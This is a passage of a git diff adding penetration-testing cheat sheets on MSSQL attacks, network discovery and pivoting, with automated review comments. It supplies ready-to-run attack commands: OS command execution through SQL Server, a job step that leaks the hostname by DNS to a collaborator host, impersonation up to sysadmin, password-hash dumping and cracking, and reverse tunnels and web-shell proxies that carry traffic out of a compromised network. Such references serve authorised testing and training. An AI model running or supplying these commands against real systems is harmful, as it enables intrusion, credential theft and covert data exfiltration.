+ +### Execute commands through SQL Agent Job service + +```ps1 +Invoke-SQLOSCmdAgentJob -Subsystem PowerShell -Username sa -Password Password1234 -Instance "" -Command "powershell e " -Verbose +Subsystem Options: +–Subsystem CmdExec +-SubSystem PowerShell +–Subsystem VBScript +–Subsystem Jscript +``` + +```sql +USE msdb; +EXEC dbo.sp_add_job @job_name = N'test_powershell_job1'; +EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'$name=$env:COMPUTERNAME[10];nslookup "$name.redacted.burpcollaborator.net"', @retry_attempts = 1, @retry_interval = 5 ; +EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; +EXEC dbo.sp_start_job N'test_powershell_job1'; + +-- delete +EXEC dbo.sp_delete_job @job_name = N'test_powershell_job1'; +``` + +### List All Jobs + +```ps1 +SELECT job_id, [name] FROM msdb.dbo.sysjobs; +SELECT job.job_id, notify_level_email, name, enabled, description, step_name, command, server, database_name FROM msdb.dbo.sysjobs job INNER JOIN msdb.dbo.sysjobsteps steps ON job.job_id = steps.job_id +Get-SQLAgentJob -Instance "" -username sa -Password Password1234 -Verbose +``` + +## External Scripts + +:warning: You need to enable **external scripts**. 
+ +```sql +sp_configure 'external scripts enabled', 1; +RECONFIGURE; +``` + +## Python: + +```ps1 +Invoke-SQLOSCmdPython -Username sa -Password Password1234 -Instance "" -Command "powershell -e " -Verbose + +EXEC sp_execute_external_script @language =N'Python',@script=N'import subprocess p = subprocess.Popen("cmd.exe /c whoami", stdout=subprocess.PIPE) OutputDataSet = pandas.DataFrame([str(p.stdout.read(), "utf-8")])' +WITH RESULT SETS (([cmd_out] nvarchar(max))) +``` + +## R + +```ps1 +Invoke-SQLOSCmdR -Username sa -Password Password1234 -Instance "" -Command "powershell -e " -Verbose + +EXEC sp_execute_external_script @language=N'R',@script=N'OutputDataSet <- data.frame(system("cmd.exe /c dir",intern=T))' +WITH RESULT SETS (([cmd_out] text)); +GO + +@script=N'OutputDataSet <-data.frame(shell("dir",intern=T))' +``` + +## Audit Checks + + +### Find and exploit impersonation opportunities + +* Impersonate as: `EXECUTE AS LOGIN = 'sa'` +* Impersonate `dbo` with DB_OWNER + ```sql + SQL> select is_member('db_owner'); + SQL> execute as user = 'dbo' + SQL> SELECT is_srvrolemember('sysadmin') + ``` + +```ps1 +Invoke-SQLAuditPrivImpersonateLogin -Username sa -Password Password1234 -Instance "" -Exploit -Verbose + +# impersonate sa account +powerpick Get-SQLQuery -Instance "" -Query "EXECUTE AS LOGIN = 'sa'; SELECT IS_SRVROLEMEMBER(''sysadmin'')" -Verbose -Debug +``` + +## Find databases that have been configured as trustworthy + +```sql +Invoke-SQLAuditPrivTrustworthy -Instance "" -Exploit -Verbose + +SELECT name as database_name, SUSER_NAME(owner_sid) AS database_owner, is_trustworthy_on AS TRUSTWORTHY from sys.databases +``` + +> The following audit checks run web requests to load Inveigh via reflection. Be mindful of the environment and ability to connect outbound. 
+ +```ps1 +Invoke-SQLAuditPrivXpDirtree +Invoke-SQLUncPathInjection +Invoke-SQLAuditPrivXpFileexist +``` + +## Manual SQL Server Queries + +### Query Current User & determine if the user is a sysadmin + +```sql +select suser_sname() +Select system_user +select is_srvrolemember('sysadmin') +``` + +### Current Role + +```sql +Select user +``` + +### Current DB + +```sql +select db_name() +``` + +### List all tables + +```sql +select table_name from information_schema.tables +``` + +### List all databases + +```sql +select name from master..sysdatabases +``` + +### All Logins on Server + +```sql +Select * from sys.server_principals where type_desc != 'SERVER_ROLE' +``` + +### All Database Users for a Database + +```sql +Select * from sys.database_principals where type_desc != 'database_role'; +``` + +### List All Sysadmins + +```sql +SELECT name,type_desc,is_disabled FROM sys.server_principals WHERE IS_SRVROLEMEMBER ('sysadmin',name) = 1 +``` + +### List All Database Roles + +```sql +SELECT DB1.name AS DatabaseRoleName, +isnull (DB2.name, 'No members') AS DatabaseUserName +FROM sys.database_role_members AS DRM +RIGHT OUTER JOIN sys.database_principals AS DB1 +ON DRM.role_principal_id = DB1.principal_id +LEFT OUTER JOIN sys.database_principals AS DB2 +ON DRM.member_principal_id = DB2.principal_id +WHERE DB1.type = 'R' +ORDER BY DB1.name; +``` + +### Effective Permissions from the Server + +```sql +select * from fn_my_permissions(null, 'server'); +``` + +### Effective Permissions from the Database + +```sql +SELECT * FROM fn_dp1my_permissions(NULL, 'DATABASE'); +``` + +### Find SQL Server Logins Which can be Impersonated for the Current Database + +```sql +select distinct b.name +from sys.server_permissions a +inner join sys.server_principals b +on a.grantor_principal_id = b.principal_id +where a.permission_name = 'impersonate' +``` + +### Exploiting Impersonation + +```sql +SELECT SYSTEM_USER +SELECT IS_SRVROLEMEMBER('sysadmin') +EXECUTE AS LOGIN = 'adminuser' +SELECT 
SYSTEM_USER +SELECT IS_SRVROLEMEMBER('sysadmin') +SELECT ORIGINAL_LOGIN() +``` + +### Exploiting Nested Impersonation + +```sql +SELECT SYSTEM_USER +SELECT IS_SRVROLEMEMBER('sysadmin') +EXECUTE AS LOGIN = 'stduser' +SELECT SYSTEM_USER +EXECUTE AS LOGIN = 'sa' +SELECT IS_SRVROLEMEMBER('sysadmin') +SELECT ORIGINAL_LOGIN() +SELECT SYSTEM_USER +``` + +### MSSQL Accounts and Hashes + +```sql +MSSQL 2000: +SELECT name, password FROM master..sysxlogins +SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.) + +MSSQL 2005 +SELECT name, password_hash FROM master.sys.sql_logins +SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins +``` + +Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat.txt /usr/share/wordlists/rockyou.txt --force` + +```ps1 +131 MSSQL (2000) 0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578 +132 MSSQL (2005) 0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe +1731 MSSQL (2012, 2014) 0x02000102030434ea1b17802fd95ea6316bd61d2c94622ca3812793e8fb1672487b5c904a45a31b2ab4a78890d563d2fcf5663e46fe797d71550494be50cf4915d3f4d55ec375 +``` + + +## References + +* [PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt](https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3) +* [PowerUpSQL Cheat Sheet - Scott Sutherland](https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet) +* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/) +* [MSSQL Agent Jobs for Command Execution - Nicholas Popovich - September 21, 2016](https://www.optiv.com/explore-optiv-insights/blog/mssql-agent-jobs-command-execution) \ No newline at end of file 
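Review bot: `SELECT * FROM fn_dp1my_permissions(NULL, 'DATABASE');` under "Effective Permissions from the Database" is a typo for `fn_my_permissions` and fails as written; the server-level query just above it uses the correct name. Several command lines also carry slips that break when pasted: `-Command "net user backup Password1234 /add'"` has a stray quote, the `Invoke-SQLOSCmdCLR` and `Invoke-SQLOSCmdOle` examples end in `Verbose` without the leading dash, `-Command "powershell e "` is missing the `-e`, and the Agent Job subsystem list uses en dashes (`–Subsystem CmdExec`). In the OLE Automation block `EXEC sp_configure reconfigure` is not valid T-SQL; use `RECONFIGURE;` as the xp_cmdshell and CLR sections do, and that block is T-SQL with `#` comments inside a `ps1` fence. `Get-SQLInstanceDomain | Get-Query "select @@version"` should be `Get-SQLQuery`, the PowerUpSQL cmdlet used everywhere else on the page. Documentation: the Summary anchors `#identifiy-instaces-and-databases`, `#identifiy-encrypted-databases`, `#discover-remote-sql-instances`, `#get-tables-from-specific-databases` and `#list-all-database-role` do not match their headings, so those links are dead; the `Invoke-SQLAuditPrivTrustworthy` line sits inside a `sql` fence; and the file is added without a trailing newline.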
diff --git a/docs/pentest/Miscellaneous - Tricks.md b/docs/pentest/Miscellaneous - Tricks.md new file mode 100644 index 0000000..e82618b --- /dev/null +++ b/docs/pentest/Miscellaneous - Tricks.md @@ -0,0 +1,27 @@ +# Miscellaneous & Tricks + +All the tricks that couldn't be classified somewhere else. + +## Send a message to another user + +```powershell +# Windows +PS C:\> msg Swissky /SERVER:CRASHLAB "Stop rebooting the XXXX service !" +PS C:\> msg * /V /W /SERVER:CRASHLAB "Hello all !" + +# Linux +$ wall "Stop messing with the XXX service !" +$ wall -n "System will go down for 2 hours maintenance at 13:00 PM" # "-n" only for root +$ who +$ write root pts/2 # press Ctrl+D after typing the message. +``` + +## CrackMapExec Credential Database + +```ps1 +cmedb (default) > workspace create test +cmedb (test) > workspace default +cmedb (test) > proto smb +cmedb (test)(smb) > creds +cmedb (test)(smb) > export creds csv /tmp/creds +``` \ No newline at end of file diff --git a/docs/pentest/Network Discovery.md b/docs/pentest/Network Discovery.md new file mode 100644 index 0000000..8b216cb --- /dev/null +++ b/docs/pentest/Network Discovery.md 
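Review bot: `wall -n "System will go down for 2 hours maintenance at 13:00 PM"` mixes 24-hour time with `PM`; drop one of them. Unlike the other pages added in this patch, this file has no Summary or References section, and it is committed without a trailing newline (`\ No newline at end of file`); both are worth aligning with the rest of the migration before it lands.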
@@ -0,0 +1,256 @@ +# Network Discovery + +## Summary + +- [Nmap](#nmap) +- [Network Scan with nc and ping](#network-scan-with-nc-and-ping) +- [Spyse](#spyse) +- [Masscan](#masscan) +- [Netdiscover](#netdiscover) +- [Responder](#responder) +- [Bettercap](#bettercap) +- [Reconnoitre](#reconnoitre) +- [SSL MITM with OpenSSL](#ssl-mitm-with-openssl) +- [References](#references) + +## Nmap + +* Ping sweep (No port scan, No DNS resolution) + +```powershell +nmap -sn -n --disable-arp-ping 192.168.1.1-254 | grep -v "host down" +-sn : Disable port scanning. Host discovery only. +-n : Never do DNS resolution +``` + +* Basic NMAP + +```bash +sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4 +sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv + +• the flag -sSV defines the type of packet to send to the server and tells Nmap to try and determine any service on open ports +• the -p- tells Nmap to check all 65,535 ports (by default it will only check the most popular 1,000) +• 192.168.0.1 is the IP address to scan +• -oA OUTPUTFILE tells Nmap to output the findings in its three major formats at once using the filename "OUTPUTFILE" +• -iL INPUTFILE tells Nmap to use the provided file as inputs +``` + +* CTF NMAP + +This configuration is enough to do a basic check for a CTF VM + +```bash +nmap -sV -sC -oA ~/nmap-initial 192.168.1.1 + +-sV : Probe open ports to determine service/version info +-sC : to enable the script +-oA : to save the results + +After this quick command you can add "-p-" to run a full scan while you work with the previous result +``` + +* Aggressive NMAP + +```bash +nmap -A -T4 scanme.nmap.org +• -A: Enable OS detection, version detection, script scanning, and traceroute +• -T4: Defines the timing for the task (options are 0-5 and higher is faster) +``` + +* Using searchsploit to detect vulnerable services + +```bash +nmap -p- -sV -oX a.xml IP_ADDRESS; searchsploit --nmap a.xml +``` + +* Generating nice scan report + +```bash +nmap -sV IP_ADDRESS -oX scan.xml && 
xsltproc scan.xml -o "`date +%m%d%y`_report.html" +``` + +* NMAP Scripts + +```bash +nmap -sC : equivalent to --script=default + +nmap --script 'http-enum' -v web.xxxx.com -p80 -oN http-enum.nmap +PORT STATE SERVICE +80/tcp open http +| http-enum: +| /phpmyadmin/: phpMyAdmin +| /.git/HEAD: Git folder +| /css/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)' +|_ /image/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)' + +nmap --script smb-enum-users.nse -p 445 [target host] +Host script results: +| smb-enum-users: +| METASPLOITABLE\backup (RID: 1068) +| Full name: backup +| Flags: Account disabled, Normal user account +| METASPLOITABLE\bin (RID: 1004) +| Full name: bin +| Flags: Account disabled, Normal user account +| METASPLOITABLE\msfadmin (RID: 3000) +| Full name: msfadmin,,, +| Flags: Normal user account + +List Nmap scripts : ls /usr/share/nmap/scripts/ +``` + +## Network Scan with nc and ping + +Sometimes we want to perform network scan without any tools like nmap. So we can use the commands `ping` and `nc` to check if a host is up and which port is open. +To check if hosts are up on a /24 range +```bash +for i in `seq 1 255`; do ping -c 1 -w 1 192.168.1.$i > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "192.168.1.$i is UP"; fi ; done +``` +To check which ports are open on a specific host +```bash +for i in {21,22,80,139,443,445,3306,3389,8080,8443}; do nc -z -w 1 192.168.1.18 $i > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "192.168.1.18 has port $i open"; fi ; done +``` +Both at the same time on a /24 range +```bash +for i in `seq 1 255`; do ping -c 1 -w 1 192.168.1.$i > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "192.168.1.$i is UP:"; for j in {21,22,80,139,443,445,3306,3389,8080,8443}; do nc -z -w 1 192.168.1.$i $j > /dev/null 2>&1; if [ $? 
-eq 0 ]; then echo "\t192.168.1.$i has port $j open"; fi ; done ; fi ; done +``` +Not in one-liner version: +```bash +for i in `seq 1 255`; +do + ping -c 1 -w 1 192.168.1.$i > /dev/null 2>&1; + if [ $? -eq 0 ]; + then + echo "192.168.1.$i is UP:"; + for j in {21,22,80,139,443,445,3306,3389,8080,8443}; + do + nc -z -w 1 192.168.1.$i $j > /dev/null 2>&1; + if [ $? -eq 0 ]; + then + echo "\t192.168.1.$i has port $j open"; + fi ; + done ; + fi ; +done +``` + + +## Spyse +* Spyse API - for detailed info is better to check [Spyse](https://spyse.com/) + +* [Spyse Wrapper](https://github.com/zeropwn/spyse.py) + +#### Searching for subdomains +```bash +spyse -target xbox.com --subdomains +``` + +#### Reverse IP Lookup +```bash +spyse -target 52.14.144.171 --domains-on-ip +``` + +#### Searching for SSL certificates +```bash +spyse -target hotmail.com --ssl-certificates +``` +```bash +spyse -target "org: Microsoft" --ssl-certificates +``` +#### Getting all DNS records +```bash +spyse -target xbox.com --dns-all +``` + +## Masscan + +```powershell +masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out +masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000 + +# find machines on the network +sudo masscan --rate 500 --interface tap0 --router-ip $ROUTER_IP --top-ports 100 $NETWORK -oL masscan_machines.tmp +cat masscan_machines.tmp | grep open | cut -d " " -f4 | sort -u > masscan_machines.lst + +# find open ports for one machine +sudo masscan --rate 1000 --interface tap0 --router-ip $ROUTER_IP -p1-65535,U:1-65535 $MACHINE_IP --banners -oL $MACHINE_IP/scans/masscan-ports.lst + + +# TCP grab banners and services information +TCP_PORTS=$(cat $MACHINE_IP/scans/masscan-ports.lst| grep open | grep tcp | cut -d " " -f3 | tr '\n' ',' | head -c -1) +[ "$TCP_PORTS" ] && sudo nmap -sT -sC -sV -v -Pn -n -T4 -p$TCP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_tcp $MACHINE_IP + +# UDP grab banners and services information +UDP_PORTS=$(cat 
$MACHINE_IP/scans/masscan-ports.lst| grep open | grep udp | cut -d " " -f3 | tr '\n' ',' | head -c -1) +[ "$UDP_PORTS" ] && sudo nmap -sU -sC -sV -v -Pn -n -T4 -p$UDP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_udp $MACHINE_IP +``` + +## Reconnoitre + +Dependencies: + +* nbtscan +* nmap + +```powershell +python2.7 ./reconnoitre.py -t 192.168.1.2-252 -o ./results/ --pingsweep --hostnames --services --quick +``` + +If you have a segfault with nbtscan, read the following quote. +> Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255 + +## Netdiscover + +```powershell +netdiscover -i eth0 -r 192.168.1.0/24 +Currently scanning: Finished! | Screen View: Unique Hosts + +20 Captured ARP Req/Rep packets, from 4 hosts. Total size: 876 +_____________________________________________________________________________ +IP At MAC Address Count Len MAC Vendor / Hostname +----------------------------------------------------------------------------- +192.168.1.AA 68:AA:AA:AA:AA:AA 15 630 Sagemcom +192.168.1.XX 52:XX:XX:XX:XX:XX 1 60 Unknown vendor +192.168.1.YY 24:YY:YY:YY:YY:YY 1 60 QNAP Systems, Inc. +192.168.1.ZZ b8:ZZ:ZZ:ZZ:ZZ:ZZ 3 126 HUAWEI TECHNOLOGIES CO.,LTD +``` + +## Responder + +```powershell +responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding. +responder.py -I eth0 -wrf +``` + +Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows) + +## Bettercap + +```powershell +bettercap -X --proxy --proxy-https -T +# better cap in spoofing, discovery, sniffer +# intercepting http and https requests, +# targetting specific IP only +``` + +## SSL MITM with OpenSSL +This code snippet allows you to sniff/modify SSL traffic if there is a MITM vulnerability using only openssl. 
+If you can modify `/etc/hosts` of the client: +```powershell +sudo echo "[OPENSSL SERVER ADDRESS] [domain.of.server.to.mitm]" >> /etc/hosts # On client host +``` +On our MITM server, if the client accepts self signed certificates (you can use a legit certificate if you have the private key of the legit server): +```powershell +openssl req -subj '/CN=[domain.of.server.to.mitm]' -batch -new -x509 -days 365 -nodes -out server.pem -keyout server.pem +``` +On our MITM server, we setup our infra: +```powershell +mkfifo response +sudo openssl s_server -cert server.pem -accept [INTERFACE TO LISTEN TO]:[PORT] -quiet < response | tee | openssl s_client -quiet -servername [domain.of.server.to.mitm] -connect[IP of server to MITM]:[PORT] | tee | cat > response +``` +In this example, traffic is only displayed with `tee` but we could modify it using `sed` for example. + +## References + +* [TODO](TODO) diff --git a/docs/pentest/Network Pivoting Techniques.md b/docs/pentest/Network Pivoting Techniques.md new file mode 100644 index 0000000..11669b6 --- /dev/null +++ b/docs/pentest/Network Pivoting Techniques.md 
@@ -0,0 +1,503 @@ +# Network Pivoting Techniques + +## Summary + +* [SOCKS Compatibility Table](#socks-compatibility-table) +* [Windows netsh Port Forwarding](#windows-netsh-port-forwarding) +* [SSH](#ssh) + * [SOCKS Proxy](#socks-proxy) + * [Local Port Forwarding](#local-port-forwarding) + * [Remote Port Forwarding](#remote-port-forwarding) +* [Proxychains](#proxychains) +* [Graftcp](#graftcp) +* [Web SOCKS - reGeorg](#web-socks---regeorg) +* [Web SOCKS - pivotnacci](#web-socks---pivotnacci) +* [Metasploit](#metasploit) +* [sshuttle](#sshuttle) +* [chisel](#chisel) + * [SharpChisel](#sharpchisel) +* [gost](#gost) +* [Rpivot](#rpivot) +* [RevSocks](#revsocks) +* [plink](#plink) +* [ngrok](#ngrok) +* [Capture a network trace with builtin tools](#capture-a-network-trace-with-builtin-tools) +* [Basic Pivoting Types](#basic-pivoting-types) + * [Listen - Listen](#listen---listen) + * [Listen - Connect](#listen---connect) + * [Connect - Connect](#connect---connect) +* [References](#references) + + +## SOCKS Compatibility Table + +| SOCKS Version | TCP | UDP | IPv4 | IPv6 | Hostname | +| ------------- | :---: | :---: | :---: | :---: | :---: | +| SOCKS v4 | ✅ | ❌ | ✅ | ❌ | ❌ | +| SOCKS v4a | ✅ | ❌ | ✅ | ❌ | ✅ | +| SOCKS v5 | ✅ | ✅ | ✅ | ✅ | ✅ | + + +## Windows netsh Port Forwarding + +```powershell +netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport +netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110 + +# Forward the port 4545 for the reverse shell, and the 80 for the http server for example +netsh interface portproxy add v4tov4 listenport=4545 connectaddress=192.168.50.44 connectport=4545 +netsh interface portproxy add v4tov4 listenport=80 connectaddress=192.168.50.44 connectport=80 +# Correctly open the port on the machine +netsh advfirewall firewall add rule name="PortForwarding 80" dir=in action=allow protocol=TCP 
localport=80 +netsh advfirewall firewall add rule name="PortForwarding 80" dir=out action=allow protocol=TCP localport=80 +netsh advfirewall firewall add rule name="PortForwarding 4545" dir=in action=allow protocol=TCP localport=4545 +netsh advfirewall firewall add rule name="PortForwarding 4545" dir=out action=allow protocol=TCP localport=4545 + +``` + +1. listenaddress – is a local IP address waiting for a connection. +2. listenport – local listening TCP port (the connection is waited on it). +3. connectaddress – is a local or remote IP address (or DNS name) to which the incoming connection will be redirected. +4. connectport – is a TCP port to which the connection from listenport is forwarded to. + +## SSH + +### SOCKS Proxy + +```bash +ssh -D8080 [user]@[host] + +ssh -N -f -D 9000 [user]@[host] +-f : ssh in background +-N : do not execute a remote command +``` + +Cool Tip : Konami SSH Port forwarding + +```bash +[ENTER] + [~C] +-D 1090 +``` + +### Local Port Forwarding + +```bash +ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host] +``` + +### Remote Port Forwarding + +```bash +ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host] +ssh -R 3389:10.1.1.224:3389 root@10.11.0.32 +``` + +## Proxychains + +**Config file**: /etc/proxychains.conf + +```bash +[ProxyList] +socks4 localhost 8080 +``` + +Set the SOCKS4 proxy then `proxychains nmap -sT 192.168.5.6` + +## Graftcp + +> A flexible tool for redirecting a given program's TCP traffic to SOCKS5 or HTTP proxy. + +:warning: Same as proxychains, with another mechanism to "proxify" which allow Go applications. 
+ +```ps1 +# https://github.com/hmgle/graftcp + +# Create a SOCKS5, using Chisel or another tool and forward it through SSH +(attacker) $ ssh -fNT -i /tmp/id_rsa -L 1080:127.0.0.1:1080 root@IP_VPS +(vps) $ ./chisel server --tls-key ./key.pem --tls-cert ./cert.pem -p 8443 -reverse +(victim 1) $ ./chisel client --tls-skip-verify https://IP_VPS:8443 R:socks + +# Run graftcp and specify the SOCKS5 +(attacker) $ graftcp-local -listen :2233 -logfile /tmp/toto -loglevel 6 -socks5 127.0.0.1:1080 +(attacker) $ graftcp ./nuclei -u http://172.16.1.24 +``` + +Simple configuration file for graftcp + +```py +# https://github.com/hmgle/graftcp/blob/master/local/example-graftcp-local.conf +## Listen address (default ":2233") +listen = :2233 +loglevel = 1 + +## SOCKS5 address (default "127.0.0.1:1080") +socks5 = 127.0.0.1:1080 +# socks5_username = SOCKS5USERNAME +# socks5_password = SOCKS5PASSWORD + +## Set the mode for select a proxy (default "auto") +select_proxy_mode = auto +``` + + +## Web SOCKS - reGeorg + +[reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn. + +Drop one of the following files on the server: + +- tunnel.ashx +- tunnel.aspx +- tunnel.js +- tunnel.jsp +- tunnel.nosocket.php +- tunnel.php +- tunnel.tomcat.5.jsp + +```python +python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp # the socks proxy will be on port 8080 + +optional arguments: + -h, --help show this help message and exit + -l , --listen-on The default listening address + -p , --listen-port The default listening port + -r , --read-buff Local read buffer, max data to be sent per POST + -u , --url The url containing the tunnel script + -v , --verbose Verbose output[INFO|DEBUG] +``` + +## Web SOCKS - pivotnacci + +[pivotnacci](https://github.com/blackarrowsec/pivotnacci), a tool to make socks connections through HTTP agents. 
+ +```powershell +pip3 install pivotnacci +pivotnacci https://domain.com/agent.php --password "s3cr3t" +pivotnacci https://domain.com/agent.php --polling-interval 2000 +``` + + +## Metasploit + +```powershell +# Meterpreter list active port forwards +portfwd list + +# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell +portfwd add –l 3389 –p 3389 –r target-host +portfwd add -l 88 -p 88 -r 127.0.0.1 +portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445 + +# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell +portfwd delete –l 3389 –p 3389 –r target-host +# Meterpreter delete all port forwards +portfwd flush + +or + +# Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0 +run autoroute -s 192.168.15.0/24 +use auxiliary/server/socks_proxy +set SRVPORT 9090 +set VERSION 4a +# or +use auxiliary/server/socks4a # (deprecated) + + +# Meterpreter list all active routes +run autoroute -p + +route #Meterpreter view available networks the compromised host can access +# Meterpreter add route for 192.168.14.0/24 via Session number. +route add 192.168.14.0 255.255.255.0 3 +# Meterpreter delete route for 192.168.14.0/24 via Session number. +route delete 192.168.14.0 255.255.255.0 3 +# Meterpreter delete all routes +route flush +``` + +## Empire + +```powershell +(Empire) > socksproxyserver +(Empire) > use module management/invoke_socksproxy +(Empire) > set remoteHost 10.10.10.10 +(Empire) > run +``` + +## sshuttle + +Transparent proxy server that works as a poor man's VPN. Forwards over ssh. + +* Doesn't require admin. +* Works with Linux and MacOS. +* Supports DNS tunneling. 
+ +```powershell +pacman -Sy sshuttle +apt-get install sshuttle +sshuttle -vvr user@10.10.10.10 10.1.1.0/24 +sshuttle -vvr username@pivot_host 10.2.2.0/24 + +# using a private key +$ sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa" + +# -x == exclude some network to not transmit over the tunnel +# -x x.x.x.x.x/24 +``` + +## chisel + + +```powershell +go get -v github.com/jpillora/chisel + +# forward port 389 and 88 to hacker computer +user@hacker$ /opt/chisel/chisel server -p 8008 --reverse +user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389 + +# SOCKS +user@victim$ .\chisel.exe client YOUR_IP:8008 R:socks +``` + +### SharpChisel + +A C# Wrapper of Chisel : https://github.com/shantanu561993/SharpChisel + +```powershell +user@hacker$ ./chisel server -p 8080 --key "private" --auth "user:pass" --reverse --proxy "https://www.google.com" +================================================================ +server : run the Server Component of chisel +-p 8080 : run server on port 8080 +--key "private": use "private" string to seed the generation of a ECDSA public and private key pair +--auth "user:pass" : Creds required to connect to the server +--reverse: Allow clients to specify reverse port forwarding remotes in addition to normal remotes. +--proxy https://www.google.com : Specifies another HTTP server to proxy requests to when chisel receives a normal HTTP request. Useful for hiding chisel in plain sight. + +user@victim$ SharpChisel.exe client --auth user:pass https://redacted.cloudfront.net R:1080:socks +``` + +## Ligolo + +Ligolo : Reverse Tunneling made easy for pentesters, by pentesters + + +1. Build Ligolo + ```powershell + # Get Ligolo and dependencies + cd `go env GOPATH`/src + git clone https://github.com/sysdream/ligolo + cd ligolo + make dep + + # Generate self-signed TLS certificates (will be placed in the certs folder) + make certs TLS_HOST=example.com + + make build-all + ``` +2. 
Use Ligolo + ```powershell + # On your attack server. + ./bin/localrelay_linux_amd64 + + # On the compromise host. + ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555 + ``` + +## Gost + +> Wiki English : https://docs.ginuerzh.xyz/gost/en/ + +```powershell +git clone https://github.com/ginuerzh/gost +cd gost/cmd/gost +go build + +# Socks5 Proxy +Server side: gost -L=socks5://:1080 +Client side: gost -L=:8080 -F=socks5://server_ip:1080?notls=true + +# Local Port Forward +gost -L=tcp://:2222/192.168.1.1:22 [-F=..] +``` + +## Rpivot + +Server (Attacker box) + +```python +python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0 +``` + +Client (Compromised box) + +```python +python client.py --server-ip --server-port 9443 +``` + +Through corporate proxy + +```python +python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \ +--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e +``` + +Passing the hash + +```python +python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \ +--ntlm-proxy-port 8080 --domain CORP --username jdoe \ +--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE +``` + +## revsocks + +```powershell +# Listen on the server and create a SOCKS 5 proxy on port 1080 +user@VPS$ ./revsocks -listen :8443 -socks 127.0.0.1:1080 -pass Password1234 + +# Connect client to the server +user@PC$ ./revsocks -connect 10.10.10.10:8443 -pass Password1234 +user@PC$ ./revsocks -connect 10.10.10.10:8443 -pass Password1234 -proxy proxy.domain.local:3128 -proxyauth Domain/userpame:userpass -useragent "Mozilla 5.0/IE Windows 10" +``` + + +```powershell +# Build for Linux +git clone https://github.com/kost/revsocks +export GOPATH=~/go +go get github.com/hashicorp/yamux +go get github.com/armon/go-socks5 +go get github.com/kost/go-ntlmssp +go build +go build -ldflags="-s -w" && upx --brute revsocks + +# Build for Windows +go get 
github.com/hashicorp/yamux +go get github.com/armon/go-socks5 +go get github.com/kost/go-ntlmssp +GOOS=windows GOARCH=amd64 go build -ldflags="-s -w" +go build -ldflags -H=windowsgui +upx revsocks +``` + + +## plink + +```powershell +# exposes the SMB port of the machine in the port 445 of the SSH Server +plink -l root -pw toor -R 445:127.0.0.1:445 +# exposes the RDP port of the machine in the port 3390 of the SSH Server +plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389 + +plink -l root -pw mypassword 192.168.18.84 -R +plink.exe -v -pw mypassword user@10.10.10.10 -L 6666:127.0.0.1:445 + +plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP] +# redirects the Windows port 445 to Kali on port 22 +plink -P 22 -l root -pw some_password -C -R 445:127.0.0.1:445 192.168.12.185 +``` + +## ngrok + +```powershell +# get the binary +wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip +unzip ngrok-stable-linux-amd64.zip + +# log into the service +./ngrok authtoken 3U[REDACTED_TOKEN]Hm + +# deploy a port forwarding for 4433 +./ngrok http 4433 +./ngrok tcp 4433 +``` + +## cloudflared + +```bash +# Get the binary +wget https://bin.equinox.io/c/VdrWdbjqyF/cloudflared-stable-linux-amd64.tgz +tar xvzf cloudflared-stable-linux-amd64.tgz +# Expose accessible internal service to the internet +./cloudflared tunnel --url ://: +``` + +## Capture a network trace with builtin tools + +* Windows (netsh) + ```ps1 + # start a capture use the netsh command. + netsh trace start capture=yes report=disabled tracefile=c:\trace.etl maxsize=16384 + + # stop the trace + 